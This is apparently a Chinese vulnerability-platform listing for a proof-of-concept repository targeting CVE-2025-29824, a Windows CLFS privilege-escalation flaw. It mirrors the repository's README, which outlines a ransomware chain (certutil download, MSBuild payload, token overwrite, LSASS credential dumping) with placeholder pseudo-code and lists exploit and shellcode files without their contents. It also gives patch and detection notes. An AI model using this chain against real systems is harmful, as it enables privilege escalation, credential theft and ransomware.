漏洞平台

POC详情： 8910ce4749e94598d02a9110573b865157d960fc

来源

https://github.com/AfanPan/CVE-2025-29824-Exploit

关联漏洞

标题： Microsoft Windows Common Log File System Driver 资源管理错误漏洞 (CVE-2025-29824)
描述：Microsoft Windows Common Log File System Driver是美国微软（Microsoft）公司的通用日志文件系统 (CLFS) API 提供了一个高性能、通用的日志文件子系统，专用客户端应用程序可以使用该子系统并且多个客户端可以共享以优化日志访问。 Microsoft Windows Common Log File System Driver存在资源管理错误漏洞。以下产品和版本受到影响：Windows 10 Version 1809 for 32-bit Systems

描述

Use after free in Windows Common Log File System Driver allows an authorized attacker to elevate privileges locally.

介绍

🚨 CVE-2025-29824 Exploit: PipeMagic Ransomware Chain

📌 Critical Vulnerability Overview

<span style="color: #ff5555; font-weight: bold">Privilege Escalation Flaw in Windows CLFS</span> → SYSTEM Privilege Hijack  
Exploited in Active Ransomware Attacks by <span style="background-color: #222222; color: #ff9966; padding: 2px 6px">Storm-2460 Threat Group</span>

🖥️ Affected Systems

<strong>Expand System List</strong>

🧩 Exploit Chain Workflow

graph LR
    A[Initial Access] -->|certutil| B[Malicious MSBuild Payload]
    B --> C[PipeMagic Trojan]
    C -->|CVE-2025-29824| D[CLFS Kernel Exploit]
    D -->|RtlSetAllBits| E[Token Overwrite 0xFFFFFFFF]
    E --> F[SYSTEM Privileges]
    F --> G[LSASS Dumping]
    G --> H[Ransomware Deployment]


1. Initial Access  
   <small style="color: #aaaaaa">Unknown vector → Compromised sites via <code>certutil</code></small>
2. PipeMagic Loader  
   <small style="color: #aaaaaa">Modular trojan (active since 2022)</small>
3. Kernel Exploit  
   // Core vulnerability logic
   CLFS_Trigger_Corruption();
   RtlSetAllBits(exploit_process_token, 0xFFFFFFFF);
   
4. Post-Exploitation  
   • <span style="color: #ff5555">LSASS memory dump</span> → Credential theft

   • File encryption with <span style="background-color: #333333; color: #55ffff; padding: 2px 4px">.random_extension</span>

   • <span style="color: #ff55ff">RansomEXX</span> TOR note deployment

🌩️ Attack Attribution & History

CVE Year Ransomware Vector

CVE-2023-28252 2023 Nokoyawa PipeMagic → CLFS

CVE-2025-24983 2025 Unknown PipeMagic → Win32K

<span style="color: #ffff55">CVE-2025-29824</span> 2025 <span style="color: #ff55ff">RansomEXX</span> PipeMagic → CLFS

Targeted Industries:  
🏢 US IT/Real Estate • 🇻🇪 Venezuela Finance • 🇪🇸 Spanish Software • 🇸🇦 Saudi Retail

🛡️ Mitigation Requirements

+ Patch Applied: MS April 2025 Patch Tuesday
! Detection Priority: certutil -> MSBuild activity
- Block Pattern: RtlSetAllBits token manipulation


Win11 24H2 Immunity:  
NtQuerySystemInformation restricted to SeDebugPrivilege accounts

⚠️ Legal & Ethical Warning  

This exploit is published FOR RESEARCH PURPOSES ONLY.  

Active ransomware deployment confirmed in:

<div style="border-left: 3px solid #ff5555; padding-left: 10px">

"Attacks on IT/real estate (US), finance (Venezuela),<br> 

software (Spain), retail (Saudi Arabia)"

</div>

https://thehackernews.com/2025/04/pipemagic-trojan-exploits-windows-zero.html

!https://img.shields.io/badge/RISK-CRITICAL-red 
!https://img.shields.io/badge/PATCHED-April_2025-green 
!https://img.shields.io/badge/SCOPE-Win7→Server_2025-orange

文件快照


 [4.0K]  /data/pocs/8910ce4749e94598d02a9110573b865157d960fc
├── [1.0K]  cve-2025-29824.sln
├── [4.9K]  cve-2025-29824.vcxproj
├── [ 168]  cve-2025-29824.vcxproj.user
├── [4.5K]  exploit.cpp
├── [2.6K]  README.md
└── [ 526]  shellcode.asm

0 directories, 6 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。